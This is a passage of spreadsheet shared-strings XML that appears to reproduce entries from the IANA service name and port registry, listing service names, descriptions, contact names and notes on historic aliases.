    <t>Siebel NS</t>
  </si>
  <si>
    <t>[Gilberto_Arnaiz]</t>
  </si>
  <si>
    <t>rdlap</t>
  </si>
  <si>
    <t>RDLAP</t>
  </si>
  <si>
    <t>[Robert_Wiebe]</t>
  </si>
  <si>
    <t>ofsd</t>
  </si>
  <si>
    <t>3d-nfsd</t>
  </si>
  <si>
    <t>[Mike_Sherrill]</t>
  </si>
  <si>
    <t>cosmocall</t>
  </si>
  <si>
    <t>Cosmocall</t>
  </si>
  <si>
    <t>[Steve_Dellutri]</t>
  </si>
  <si>
    <t>ansysli</t>
  </si>
  <si>
    <t>ANSYS Licensing Interconnect</t>
  </si>
  <si>
    <t>Modified: 27 October 2008</t>
  </si>
  <si>
    <t>idcp</t>
  </si>
  <si>
    <t>IDCP</t>
  </si>
  <si>
    <t>[Keisokugiken_Corp]</t>
  </si>
  <si>
    <t>xingcsm</t>
  </si>
  <si>
    <t>[Dave_Spencer]</t>
  </si>
  <si>
    <t>netrix-sftm</t>
  </si>
  <si>
    <t>Netrix SFTM</t>
  </si>
  <si>
    <t>[Garrett_Herschleb]</t>
  </si>
  <si>
    <t>NVD</t>
  </si>
  <si>
    <t>[Peter_Weyman]</t>
  </si>
  <si>
    <t>tscchat</t>
  </si>
  <si>
    <t>TSCCHAT</t>
  </si>
  <si>
    <t>[Mike_Jackson]</t>
  </si>
  <si>
    <t>agentview</t>
  </si>
  <si>
    <t>AGENTVIEW</t>
  </si>
  <si>
    <t>[Ram_Iyer]</t>
  </si>
  <si>
    <t>rcc-host</t>
  </si>
  <si>
    <t>RCC Host</t>
  </si>
  <si>
    <t>[Martin_Shoemaker]</t>
  </si>
  <si>
    <t>snapp</t>
  </si>
  <si>
    <t>SNAPP</t>
  </si>
  <si>
    <t>[Dan_Burrows]</t>
  </si>
  <si>
    <t>ace-client</t>
  </si>
  <si>
    <t>ACE Client Auth</t>
  </si>
  <si>
    <t>ace-proxy</t>
  </si>
  <si>
    <t>ACE Proxy</t>
  </si>
  <si>
    <t>[Riaz_Zolfonoon]</t>
  </si>
  <si>
    <t>appleugcontrol</t>
  </si>
  <si>
    <t>Apple UG Control</t>
  </si>
  <si>
    <t>[Gene_Tyacke]</t>
  </si>
  <si>
    <t>ideesrv</t>
  </si>
  <si>
    <t>[Marazzi]</t>
  </si>
  <si>
    <t>norton-lambert</t>
  </si>
  <si>
    <t>Norton Lambert</t>
  </si>
  <si>
    <t>[Richard_de_Mornay]</t>
  </si>
  <si>
    <t>3com-webview</t>
  </si>
  <si>
    <t>3Com WebView</t>
  </si>
  <si>
    <t>[Jennifer_Grace]</t>
  </si>
  <si>
    <t>wrs-registry</t>
  </si>
  <si>
    <t>WRS Registry
IANA assigned this well-formed service name as a replacement for "wrs_registry".</t>
  </si>
  <si>
    <t>[Christophe_Cleraux]</t>
  </si>
  <si>
    <t>wrs_registry</t>
  </si>
  <si>
    <t>WRS Registry</t>
  </si>
  <si>
    <t>This entry is an alias to "wrs-registry".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>xiostatus</t>
  </si>
  <si>
    <t>XIO Status</t>
  </si>
  <si>
    <t>[Randy_Maas]</t>
  </si>
  <si>
    <t>manage-exec</t>
  </si>
  <si>
    <t>Seagate Manage Exec</t>
  </si>
  <si>
    <t>[Jim_Flaherty]</t>
  </si>
  <si>
    <t>nati-logos</t>
  </si>
  <si>
    <t>nati logos</t>
  </si>
  <si>
    <t>[James_Juhasz]</t>
  </si>
  <si>
    <t>fcmsys</t>
  </si>
  <si>
    <t>dbm</t>
  </si>
  <si>
    <t>[Dean_Robson]</t>
  </si>
  <si>
    <t>redstorm-join</t>
  </si>
  <si>
    <t>Game Connection Port
IANA assigned this well-formed service name as a replacement for "redstorm_join".</t>
  </si>
  <si>
    <t>redstorm_join</t>
  </si>
  <si>
    <t>Game Connection Port</t>
  </si>
  <si>
    <t>This entry is an alias to "redstorm-join".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>redstorm-find</t>
  </si>
  <si>
    <t>Game Announcement and Location
IANA assigned this well-formed service name as a replacement for "redstorm_find".</t>
  </si>
  <si>
    <t>redstorm_find</t>
  </si>
  <si>
    <t>Game Announcement and Location</t>
  </si>
  <si>
    <t>This entry is an alias to "redstorm-find".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>redstorm-info</t>
  </si>
  <si>
    <t>Information to query for game status
IANA assigned this well-formed service name as a replacement for "redstorm_info".</t>
  </si>
  <si>
    <t>redstorm_info</t>
  </si>
  <si>
    <t>Information to query for game status</t>
  </si>
  <si>
    <t>This entry is an alias to "redstorm-info".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>redstorm-diag</t>
  </si>
  <si>
    <t>Diagnostics Port
IANA assigned this well-formed service name as a replacement for "redstorm_diag".</t>
  </si>
  <si>
    <t>[David_Weinstein]</t>
  </si>
  <si>
    <t>redstorm_diag</t>
  </si>
  <si>
    <t>Diagnostics Port</t>
  </si>
  <si>
    <t>This entry is an alias to "redstorm-diag".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>psbserver</t>
  </si>
  <si>
    <t>Pharos Booking Server</t>
  </si>
  <si>
    <t>psrserver</t>
  </si>
  <si>
    <t>pslserver</t>
  </si>
  <si>
    <t>pspserver</t>
  </si>
  <si>
    <t>psprserver</t>
  </si>
  <si>
    <t>psdbserver</t>
  </si>
  <si>
    <t>[Paul_Reddy]</t>
  </si>
  <si>
    <t>gxtelmd</t>
  </si>
  <si>
    <t>GXT License Managemant</t>
  </si>
  <si>
    <t>[Robert_Hodgson]</t>
  </si>
  <si>
    <t>unihub-server</t>
  </si>
  <si>
    <t>UniHub Server</t>
  </si>
  <si>
    <t>[Tim_Kenyon]</t>
  </si>
  <si>
    <t>futrix</t>
  </si>
  <si>
    <t>Futrix</t>
  </si>
  <si>
    <t>[Peter_Frankenberg]</t>
  </si>
  <si>
    <t>flukeserver</t>
  </si>
  <si>
    <t>FlukeServer</t>
  </si>
  <si>
    <t>[Bill_Marbaker]</t>
  </si>
  <si>
    <t>nexstorindltd</t>
  </si>
  <si>
    <t>NexstorIndLtd</t>
  </si>
  <si>
    <t>[NexStor_India_Limite]</t>
  </si>
  <si>
    <t>tl1</t>
  </si>
  <si>
    <t>TL1</t>
  </si>
  <si>
    <t>[Charles_Scott_Robers]</t>
  </si>
  <si>
    <t>digiman</t>
  </si>
  <si>
    <t>[Aaron_S_Kurland]</t>
  </si>
  <si>
    <t>mediacntrlnfsd</t>
  </si>
  <si>
    <t>Media Central NFSD</t>
  </si>
  <si>
    <t>[Shivakumar_S_Govind]</t>
  </si>
  <si>
    <t>oi-2000</t>
  </si>
  <si>
    <t>OI-2000</t>
  </si>
  <si>
    <t>[Software_Horizons_In]</t>
  </si>
  <si>
    <t>dbref</t>
  </si>
  <si>
    <t>[Yoshihiro_Yamazaki]</t>
  </si>
  <si>
    <t>qip-login</t>
  </si>
  <si>
    <t>[Mike_Morgan]</t>
  </si>
  <si>
    <t>service-ctrl</t>
  </si>
  <si>
    <t>Service Control</t>
  </si>
  <si>
    <t>[Humberto_Sanchez]</t>
  </si>
  <si>
    <t>opentable</t>
  </si>
  <si>
    <t>OpenTable</t>
  </si>
  <si>
    <t>[Brett_Goldstein]</t>
  </si>
  <si>
    <t>De-registered (28 March 2006)</t>
  </si>
  <si>
    <t>l3-hbmon</t>
  </si>
  <si>
    <t>L3-HBMon</t>
  </si>
  <si>
    <t>[Dolores_Scott]</t>
  </si>
  <si>
    <t>Remote Device Access</t>
  </si>
  <si>
    <t>[Hewlett_Packard_Enterprise_2]</t>
  </si>
  <si>
    <t>[Steve_Roscio][Paul_Vencel]</t>
  </si>
  <si>
    <t>lanmessenger</t>
  </si>
  <si>
    <t>LanMessenger</t>
  </si>
  <si>
    <t>[Garrett_Padera]</t>
  </si>
  <si>
    <t>remographlm</t>
  </si>
  <si>
    <t>Remograph License Manager</t>
  </si>
  <si>
    <t>[Per_Fahlberg]</t>
  </si>
  <si>
    <t>hydra</t>
  </si>
  <si>
    <t>Hydra RPC</t>
  </si>
  <si>
    <t>[Jacob_Feisley]</t>
  </si>
  <si>
    <t>docker</t>
  </si>
  <si>
    <t>Docker REST API (plain text)</t>
  </si>
  <si>
    <t>[DOCKER]</t>
  </si>
  <si>
    <t>[Christopher_Liljenstolpe]</t>
  </si>
  <si>
    <t>docker-s</t>
  </si>
  <si>
    <t>Docker REST API (ssl)</t>
  </si>
  <si>
    <t>swarm</t>
  </si>
  <si>
    <t>RPC interface for Docker Swarm</t>
  </si>
  <si>
    <t>[Docker_Inc]</t>
  </si>
  <si>
    <t>[Mike_Goelzer]</t>
  </si>
  <si>
    <t>etcd-client</t>
  </si>
  <si>
    <t>etcd client communication</t>
  </si>
  <si>
    <t>[CoreOS]</t>
  </si>
  <si>
    <t>[Brian_Harrington]</t>
  </si>
  <si>
    <t>etcd-server</t>
  </si>
  <si>
    <t>etcd server to server communication</t>
  </si>
  <si>
    <t>compaq-https</t>
  </si>
  <si>
    <t>Compaq HTTPS</t>
  </si>
  <si>
    <t>ms-olap3</t>
  </si>
  <si>
    <t>Microsoft OLAP</t>
  </si>
  <si>
    <t>ms-olap4</t>
  </si>
  <si>
    <t>[Mosha_Pasumansky]</t>
  </si>
  <si>
    <t>sd-request</t>
  </si>
  <si>
    <t>SD-REQUEST</t>
  </si>
  <si>
    <t>sd-capacity</t>
  </si>
  <si>
    <t>SD-CAPACITY</t>
  </si>
  <si>
    <t>[Jason_McManus_2]</t>
  </si>
  <si>
    <t>sd-data</t>
  </si>
  <si>
    <t>SD-DATA</t>
  </si>
  <si>
    <t>virtualtape</t>
  </si>
  <si>
    <t>Virtual Tape</t>
  </si>
  <si>
    <t>vsamredirector</t>
  </si>
  <si>
    <t>VSAM Redirector</t>
  </si>
  <si>
    <t>[Ingo_Franzki]</t>
  </si>
  <si>
    <t>mynahautostart</t>
  </si>
  <si>
    <t>MYNAH AutoStart</t>
  </si>
  <si>
    <t>[Thomas_J_Klehr]</t>
  </si>
  <si>
    <t>ovsessionmgr</t>
  </si>
  <si>
    <t>OpenView Session Mgr</t>
  </si>
  <si>
    <t>[Eric_Pulsipher]</t>
  </si>
  <si>
    <t>rsmtp</t>
  </si>
  <si>
    <t>RSMTP</t>
  </si>
  <si>
    <t>[Geoff_Collyer]</t>
  </si>
  <si>
    <t>3com-net-mgmt</t>
  </si>
  <si>
    <t>3COM Net Management</t>
  </si>
  <si>
    <t>[Prathibha_Nagvar]</t>
  </si>
  <si>
    <t>tacticalauth</t>
  </si>
  <si>
    <t>Tactical Auth</t>
  </si>
  <si>
    <t>[David_Yon]</t>
  </si>
  <si>
    <t>ms-olap1</t>
  </si>
  <si>
    <t>MS OLAP 1</t>
  </si>
  <si>
    <t>ms-olap2</t>
  </si>
  <si>
    <t>MS OLAP 2</t>
  </si>
  <si>
    <t>lan900-remote</t>
  </si>
  <si>
    <t>LAN900 Remote
IANA assigned this well-formed service name as a replacement for "lan900_remote".</t>
  </si>
  <si>
    <t>[Tom_Quinlan]</t>
  </si>
  <si>
    <t>lan900_remote</t>
  </si>
  <si>
    <t>LAN900 Remote</t>
  </si>
  <si>
    <t>This entry is an alias to "lan900-remote".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>wusage</t>
  </si>
  <si>
    <t>Wusage</t>
  </si>
  <si>
    <t>[Thomas_Boutell]</t>
  </si>
  <si>
    <t>ncl</t>
  </si>
  <si>
    <t>NCL</t>
  </si>
  <si>
    <t>orbiter</t>
  </si>
  <si>
    <t>Orbiter</t>
  </si>
  <si>
    <t>[David_Goldberg]</t>
  </si>
  <si>
    <t>fmpro-fdal</t>
  </si>
  <si>
    <t>FileMaker, Inc. - Data Access Layer</t>
  </si>
  <si>
    <t>[Clay_Maeckal]</t>
  </si>
  <si>
    <t>opequus-server</t>
  </si>
  <si>
    <t>OpEquus Server</t>
  </si>
  <si>
    <t>[Gavin_Hutchinson_2]</t>
  </si>
  <si>
    <t>cvspserver</t>
  </si>
  <si>
    <t>[Jim_Kingdon]</t>
  </si>
  <si>
    <t>taskmaster2000</t>
  </si>
  <si>
    <t>TaskMaster 2000 Server</t>
  </si>
  <si>
    <t>TaskMaster 2000 Web</t>
  </si>
  <si>
    <t>[Ed_Odjaghian]</t>
  </si>
  <si>
    <t>iec-104</t>
  </si>
  <si>
    <t>IEC 60870-5-104 process control over IP</t>
  </si>
  <si>
    <t>[Walter_K_Eichelburg]</t>
  </si>
  <si>
    <t>trc-netpoll</t>
  </si>
  <si>
    <t>TRC Netpoll</t>
  </si>
  <si>
    <t>[Bizhan_Ghavami]</t>
  </si>
  <si>
    <t>jediserver</t>
  </si>
  <si>
    <t>JediServer</t>
  </si>
  <si>
    <t>[Paul_McEntire]</t>
  </si>
  <si>
    <t>orion</t>
  </si>
  <si>
    <t>Orion</t>
  </si>
  <si>
    <t>[Matthew_Horoschun]</t>
  </si>
  <si>
    <t>railgun-webaccl</t>
  </si>
  <si>
    <t>CloudFlare Railgun Web Acceleration Protocol</t>
  </si>
  <si>
    <t>[CloudFlare]</t>
  </si>
  <si>
    <t>[John_Graham_Cumming]</t>
  </si>
  <si>
    <t>This entry is being removed on 2012-03-09.</t>
  </si>
  <si>
    <t>sns-protocol</t>
  </si>
  <si>
    <t>SNS Protocol</t>
  </si>
  <si>
    <t>[Amir_Blich]</t>
  </si>
  <si>
    <t>vrts-registry</t>
  </si>
  <si>
    <t>VRTS Registry</t>
  </si>
  <si>
    <t>[Pranay_Varma]</t>
  </si>
  <si>
    <t>netwave-ap-mgmt</t>
  </si>
  <si>
    <t>Netwave AP Management</t>
  </si>
  <si>
    <t>[Johnny_Zweig]</t>
  </si>
  <si>
    <t>cdn</t>
  </si>
  <si>
    <t>CDN</t>
  </si>
  <si>
    <t>[Alan_Noble]</t>
  </si>
  <si>
    <t>orion-rmi-reg</t>
  </si>
  <si>
    <t>[J_S_Greenfield_2]</t>
  </si>
  <si>
    <t>beeyond</t>
  </si>
  <si>
    <t>Beeyond</t>
  </si>
  <si>
    <t>codima-rtp</t>
  </si>
  <si>
    <t>Codima Remote Transaction Protocol</t>
  </si>
  <si>
    <t>[Sylvia_Ross]</t>
  </si>
  <si>
    <t>rmtserver</t>
  </si>
  <si>
    <t>RMT Server</t>
  </si>
  <si>
    <t>[Yvon_Marineau]</t>
  </si>
  <si>
    <t>composit-server</t>
  </si>
  <si>
    <t>Composit Server</t>
  </si>
  <si>
    <t>[Katsuaki_Naoi]</t>
  </si>
  <si>
    <t>cas</t>
  </si>
  <si>
    <t>[Akiyoshi_Ochi]</t>
  </si>
  <si>
    <t>attachmate-s2s</t>
  </si>
  <si>
    <t>Attachmate S2S</t>
  </si>
  <si>
    <t>[Chris_Rominski]</t>
  </si>
  <si>
    <t>dslremote-mgmt</t>
  </si>
  <si>
    <t>DSL Remote Management</t>
  </si>
  <si>
    <t>[Westell]</t>
  </si>
  <si>
    <t>g-talk</t>
  </si>
  <si>
    <t>G-Talk</t>
  </si>
  <si>
    <t>[Matt_Hammond]</t>
  </si>
  <si>
    <t>crmsbits</t>
  </si>
  <si>
    <t>CRMSBITS</t>
  </si>
  <si>
    <t>[Rod_Ward]</t>
  </si>
  <si>
    <t>rnrp</t>
  </si>
  <si>
    <t>RNRP</t>
  </si>
  <si>
    <t>[Per_Sahlqvist]</t>
  </si>
  <si>
    <t>kofax-svr</t>
  </si>
  <si>
    <t>KOFAX-SVR</t>
  </si>
  <si>
    <t>[Steven_Kilby]</t>
  </si>
  <si>
    <t>fjitsuappmgr</t>
  </si>
  <si>
    <t>Fujitsu App Manager</t>
  </si>
  <si>
    <t>[Hiroyuki_Kawabuchi]</t>
  </si>
  <si>
    <t>vcmp</t>
  </si>
  <si>
    <t>VeloCloud MultiPath Protocol</t>
  </si>
  <si>
    <t>[VeloCloud_Networks]</t>
  </si>
  <si>
    <t>[Tim_Van_Herck]</t>
  </si>
  <si>
    <t>This port was previously removed on 2002-04-29.</t>
  </si>
  <si>
    <t>mgcp-gateway</t>
  </si>
  <si>
    <t>Media Gateway Control Protocol Gateway</t>
  </si>
  <si>
    <t>[Christian_Huitema]</t>
  </si>
  <si>
    <t>ott</t>
  </si>
  <si>
    <t>One Way Trip Time</t>
  </si>
  <si>
    <t>[Greg_Troxel]</t>
  </si>
  <si>
    <t>ft-role</t>
  </si>
  <si>
    <t>FT-ROLE</t>
  </si>
  <si>
    <t>[Doug_Boone]</t>
  </si>
  <si>
    <t>venus</t>
  </si>
  <si>
    <t>venus-se</t>
  </si>
  <si>
    <t>codasrv</t>
  </si>
  <si>
    <t>codasrv-se</t>
  </si>
  <si>
    <t>pxc-epmap</t>
  </si>
  <si>
    <t>[Jun_Nakamura]</t>
  </si>
  <si>
    <t>optilogic</t>
  </si>
  <si>
    <t>OptiLogic</t>
  </si>
  <si>
    <t>[Clark_Williams]</t>
  </si>
  <si>
    <t>topx</t>
  </si>
  <si>
    <t>TOP/X</t>
  </si>
  <si>
    <t>[Dragos_Pop]</t>
  </si>
  <si>
    <t>unicontrol</t>
  </si>
  <si>
    <t>UniControl</t>
  </si>
  <si>
    <t>[Ing_Markus_Huemer]</t>
  </si>
  <si>
    <t>MSP</t>
  </si>
  <si>
    <t>[Evan_Caves]</t>
  </si>
  <si>
    <t>sybasedbsynch</t>
  </si>
  <si>
    <t>SybaseDBSynch</t>
  </si>
  <si>
    <t>spearway</t>
  </si>
  <si>
    <t>Spearway Lockers</t>
  </si>
  <si>
    <t>[Pierre_Frisch]</t>
  </si>
  <si>
    <t>pvsw-inet</t>
  </si>
  <si>
    <t>Pervasive I*net Data Server</t>
  </si>
  <si>
    <t>[Chuck_Talk]</t>
  </si>
  <si>
    <t>netangel</t>
  </si>
  <si>
    <t>Netangel</t>
  </si>
  <si>
    <t>[Ladislav_Baranyay]</t>
  </si>
  <si>
    <t>powerclientcsf</t>
  </si>
  <si>
    <t>PowerClient Central Storage Facility</t>
  </si>
  <si>
    <t>[Brian_Klassen]</t>
  </si>
  <si>
    <t>btpp2sectrans</t>
  </si>
  <si>
    <t>BT PP2 Sectrans</t>
  </si>
  <si>
    <t>[Ian_Daniels]</t>
  </si>
  <si>
    <t>dtn1</t>
  </si>
  <si>
    <t>DTN1</t>
  </si>
  <si>
    <t>[Bob_Gaddie]</t>
  </si>
  <si>
    <t>bues-service</t>
  </si>
  <si>
    <t>bues_service
IANA assigned this well-formed service name as a replacement for "bues_service".</t>
  </si>
  <si>
    <t>[Leonhard_Diekmann]</t>
  </si>
  <si>
    <t>bues_service</t>
  </si>
  <si>
    <t>This entry is an alias to "bues-service".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>ovwdb</t>
  </si>
  <si>
    <t>OpenView NNM daemon</t>
  </si>
  <si>
    <t>[Eric_Pulsipher_2]</t>
  </si>
  <si>
    <t>hpppssvr</t>
  </si>
  <si>
    <t>hpppsvr</t>
  </si>
  <si>
    <t>[Bridgette_Landers]</t>
  </si>
  <si>
    <t>ratl</t>
  </si>
  <si>
    <t>RATL</t>
  </si>
  <si>
    <t>[Paul_Greenfield]</t>
  </si>
  <si>
    <t>netadmin</t>
  </si>
  <si>
    <t>netchat</t>
  </si>
  <si>
    <t>[Julian_Mehnle]</t>
  </si>
  <si>
    <t>snifferclient</t>
  </si>
  <si>
    <t>SnifferClient</t>
  </si>
  <si>
    <t>[Amy_Weaver_2]</t>
  </si>
  <si>
    <t>madge-ltd</t>
  </si>
  <si>
    <t>madge ltd</t>
  </si>
  <si>
    <t>[Mark_Lyall]</t>
  </si>
  <si>
    <t>indx-dds</t>
  </si>
  <si>
    <t>IndX-DDS</t>
  </si>
  <si>
    <t>[Paul_Carmichael]</t>
  </si>
  <si>
    <t>wago-io-system</t>
  </si>
  <si>
    <t>WAGO-IO-SYSTEM</t>
  </si>
  <si>
    <t>[Jorg_Hoffmann]</t>
  </si>
  <si>
    <t>altav-remmgt</t>
  </si>
  <si>
    <t>[Gary_M_Allen]</t>
  </si>
  <si>
    <t>rapido-ip</t>
  </si>
  <si>
    <t>Rapido_IP</t>
  </si>
  <si>
    <t>[Man_Shuen_Cheung]</t>
  </si>
  <si>
    <t>griffin</t>
  </si>
  <si>
    <t>[Tom_Taylor]</t>
  </si>
  <si>
    <t>xrpl</t>
  </si>
  <si>
    <t>Community</t>
  </si>
  <si>
    <t>[David_Schwartz]</t>
  </si>
  <si>
    <t>ms-theater</t>
  </si>
  <si>
    <t>[Anton_Kucer]</t>
  </si>
  <si>
    <t>qadmifoper</t>
  </si>
  <si>
    <t>qadmifevent</t>
  </si>
  <si>
    <t>[Pekka_Takaranta]</t>
  </si>
  <si>
    <t>lsi-raid-mgmt</t>
  </si>
  <si>
    <t>LSI RAID Management</t>
  </si>
  <si>
    <t>[NetApp]</t>
  </si>
  <si>
    <t>[MSW_architecture_team]</t>
  </si>
  <si>
    <t>direcpc-si</t>
  </si>
  <si>
    <t>DirecPC SI</t>
  </si>
  <si>
    <t>[Doug_Dillon]</t>
  </si>
  <si>
    <t>lbm</t>
  </si>
  <si>
    <t>Load Balance Management</t>
  </si>
  <si>
    <t>lbf</t>
  </si>
  <si>
    <t>Load Balance Forwarding</t>
  </si>
  <si>
    <t>[Kazuhiro_Koide]</t>
  </si>
  <si>
    <t>high-criteria</t>
  </si>
  <si>
    <t>High Criteria</t>
  </si>
  <si>
    <t>[Konstantin_Iavid]</t>
  </si>
  <si>
    <t>qip-msgd</t>
  </si>
  <si>
    <t>qip_msgd</t>
  </si>
  <si>
    <t>mti-tcs-comm</t>
  </si>
  <si>
    <t>MTI-TCS-COMM</t>
  </si>
  <si>
    <t>[Mario_Bonin]</t>
  </si>
  <si>
    <t>taskman-port</t>
  </si>
  <si>
    <t>taskman port</t>
  </si>
  <si>
    <t>[Boris_Panteleev]</t>
  </si>
  <si>
    <t>seaodbc</t>
  </si>
  <si>
    <t>SeaODBC</t>
  </si>
  <si>
    <t>[Adrian_Hornby]</t>
  </si>
  <si>
    <t>c3</t>
  </si>
  <si>
    <t>C3</t>
  </si>
  <si>
    <t>[Eckhard_Grieger]</t>
  </si>
  <si>
    <t>aker-cdp</t>
  </si>
  <si>
    <t>Aker-cdp</t>
  </si>
  <si>
    <t>[Rodrigo_Ormonde]</t>
  </si>
  <si>
    <t>vitalanalysis</t>
  </si>
  <si>
    <t>Vital Analysis</t>
  </si>
  <si>
    <t>[Srinivas_Reddy]</t>
  </si>
  <si>
    <t>ace-server</t>
  </si>
  <si>
    <t>ACE Server</t>
  </si>
  <si>
    <t>ace-svr-prop</t>
  </si>
  <si>
    <t>ACE Server Propagation</t>
  </si>
  <si>
    <t>ssm-cvs</t>
  </si>
  <si>
    <t>SecurSight Certificate Valifation Service</t>
  </si>
  <si>
    <t>ssm-cssps</t>
  </si>
  <si>
    <t>SecurSight Authentication Server (SSL)</t>
  </si>
  <si>
    <t>ssm-els</t>
  </si>
  <si>
    <t>SecurSight Event Logging Server (SSL)</t>
  </si>
  <si>
    <t>[John_Linn]</t>
  </si>
  <si>
    <t>powerexchange</t>
  </si>
  <si>
    <t>Informatica PowerExchange Listener</t>
  </si>
  <si>
    <t>[Dale_Norman]</t>
  </si>
  <si>
    <t>giop</t>
  </si>
  <si>
    <t>Oracle GIOP</t>
  </si>
  <si>
    <t>giop-ssl</t>
  </si>
  <si>
    <t>Oracle GIOP SSL</t>
  </si>
  <si>
    <t>ttc</t>
  </si>
  <si>
    <t>Oracle TTC</t>
  </si>
  <si>
    <t>ttc-ssl</t>
  </si>
  <si>
    <t>Oracle TTC SSL</t>
  </si>
  <si>
    <t>[Chandar_Venkataraman]</t>
  </si>
  <si>
    <t>netobjects1</t>
  </si>
  <si>
    <t>Net Objects1</t>
  </si>
  <si>
    <t>netobjects2</t>
  </si>
  <si>
    <t>Net Objects2</t>
  </si>
  <si>
    <t>[Francois_Granade]</t>
  </si>
  <si>
    <t>pns</t>
  </si>
  <si>
    <t>Policy Notice Service</t>
  </si>
  <si>
    <t>moy-corp</t>
  </si>
  <si>
    <t>Moy Corporation</t>
  </si>
  <si>
    <t>[Gang_Gong_Moy]</t>
  </si>
  <si>
    <t>tsilb</t>
  </si>
  <si>
    <t>TSILB</t>
  </si>
  <si>
    <t>[James_Irwin]</t>
  </si>
  <si>
    <t>qip-qdhcp</t>
  </si>
  <si>
    <t>qip_qdhcp</t>
  </si>
  <si>
    <t>conclave-cpp</t>
  </si>
  <si>
    <t>Conclave CPP</t>
  </si>
  <si>
    <t>[Larry_Lipstone]</t>
  </si>
  <si>
    <t>groove</t>
  </si>
  <si>
    <t>GROOVE</t>
  </si>
  <si>
    <t>[Ray_Ozzie]</t>
  </si>
  <si>
    <t>talarian-mqs</t>
  </si>
  <si>
    <t>Talarian MQS</t>
  </si>
  <si>
    <t>[Jim_Stabile]</t>
  </si>
  <si>
    <t>bmc-ar</t>
  </si>
  <si>
    <t>BMC AR</t>
  </si>
  <si>
    <t>fast-rem-serv</t>
  </si>
  <si>
    <t>Fast Remote Services</t>
  </si>
  <si>
    <t>[Scott_St_Clair]</t>
  </si>
  <si>
    <t>dirgis</t>
  </si>
  <si>
    <t>DIRGIS</t>
  </si>
  <si>
    <t>[Deutschland_Informat]</t>
  </si>
  <si>
    <t>quaddb</t>
  </si>
  <si>
    <t>Quad DB</t>
  </si>
  <si>
    <t>[Jeff_Rosenthal]</t>
  </si>
  <si>
    <t>odn-castraq</t>
  </si>
  <si>
    <t>ODN-CasTraq</t>
  </si>
  <si>
    <t>[Richard_Hodges_2]</t>
  </si>
  <si>
    <t>rtsserv</t>
  </si>
  <si>
    <t>Resource Tracking system server</t>
  </si>
  <si>
    <t>rtsclient</t>
  </si>
  <si>
    <t>Resource Tracking system client</t>
  </si>
  <si>
    <t>[Aubrey_Turner]</t>
  </si>
  <si>
    <t>kentrox-prot</t>
  </si>
  <si>
    <t>Kentrox Protocol</t>
  </si>
  <si>
    <t>[Anil_Lakhwara]</t>
  </si>
  <si>
    <t>nms-dpnss</t>
  </si>
  <si>
    <t>NMS-DPNSS</t>
  </si>
  <si>
    <t>[Jean_Christophe_Desi]</t>
  </si>
  <si>
    <t>wlbs</t>
  </si>
  <si>
    <t>WLBS</t>
  </si>
  <si>
    <t>[William_Bain]</t>
  </si>
  <si>
    <t>ppcontrol</t>
  </si>
  <si>
    <t>PowerPlay Control</t>
  </si>
  <si>
    <t>[Max_Magliaro]</t>
  </si>
  <si>
    <t>jbroker</t>
  </si>
  <si>
    <t>[Rohit_Garg_2]</t>
  </si>
  <si>
    <t>spock</t>
  </si>
  <si>
    <t>[Jon_A_Christopher]</t>
  </si>
  <si>
    <t>jdatastore</t>
  </si>
  <si>
    <t>JDataStore</t>
  </si>
  <si>
    <t>[Tod_Landis]</t>
  </si>
  <si>
    <t>fjmpss</t>
  </si>
  <si>
    <t>[Makoto_Watanabe]</t>
  </si>
  <si>
    <t>fjappmgrbulk</t>
  </si>
  <si>
    <t>metastorm</t>
  </si>
  <si>
    <t>Metastorm</t>
  </si>
  <si>
    <t>[Eric_Isom]</t>
  </si>
  <si>
    <t>citrixima</t>
  </si>
  <si>
    <t>Citrix IMA</t>
  </si>
  <si>
    <t>citrixadmin</t>
  </si>
  <si>
    <t>Citrix ADMIN</t>
  </si>
  <si>
    <t>[Myk_Willis]</t>
  </si>
  <si>
    <t>facsys-ntp</t>
  </si>
  <si>
    <t>Facsys NTP</t>
  </si>
  <si>
    <t>facsys-router</t>
  </si>
  <si>
    <t>Facsys Router</t>
  </si>
  <si>
    <t>[Jeff_Hoffman]</t>
  </si>
  <si>
    <t>maincontrol</t>
  </si>
  <si>
    <t>Main Control</t>
  </si>
  <si>
    <t>[Nathan_Sadia]</t>
  </si>
  <si>
    <t>call-sig-trans</t>
  </si>
  <si>
    <t>H.323 Annex E Call Control Signalling Transport</t>
  </si>
  <si>
    <t>willy</t>
  </si>
  <si>
    <t>Willy</t>
  </si>
  <si>
    <t>[Carl_Johan_Wik]</t>
  </si>
  <si>
    <t>globmsgsvc</t>
  </si>
  <si>
    <t>[David_Wiltz]</t>
  </si>
  <si>
    <t>pvsw</t>
  </si>
  <si>
    <t>Pervasive Listener</t>
  </si>
  <si>
    <t>adaptecmgr</t>
  </si>
  <si>
    <t>Adaptec Manager</t>
  </si>
  <si>
    <t>[Mark_Parenti]</t>
  </si>
  <si>
    <t>windb</t>
  </si>
  <si>
    <t>WinDb</t>
  </si>
  <si>
    <t>[Larry_Traylor]</t>
  </si>
  <si>
    <t>qke-llc-v3</t>
  </si>
  <si>
    <t>Qke LLC V.3</t>
  </si>
  <si>
    <t>[Joerg_Niehoff]</t>
  </si>
  <si>
    <t>optiwave-lm</t>
  </si>
  <si>
    <t>Optiwave License Management</t>
  </si>
  <si>
    <t>[Slawomir_Krzesinski]</t>
  </si>
  <si>
    <t>ms-v-worlds</t>
  </si>
  <si>
    <t>MS V-Worlds</t>
  </si>
  <si>
    <t>[Pete_Wong]</t>
  </si>
  <si>
    <t>ema-sent-lm</t>
  </si>
  <si>
    <t>EMA License Manager</t>
  </si>
  <si>
    <t>[Thaddeus_Perala]</t>
  </si>
  <si>
    <t>iqserver</t>
  </si>
  <si>
    <t>IQ Server</t>
  </si>
  <si>
    <t>[Nick_Straguzzi]</t>
  </si>
  <si>
    <t>ncr-ccl</t>
  </si>
  <si>
    <t>NCR CCL
IANA assigned this well-formed service name as a replacement for "ncr_ccl".</t>
  </si>
  <si>
    <t>[Amitava_Dutta]</t>
  </si>
  <si>
    <t>ncr_ccl</t>
  </si>
  <si>
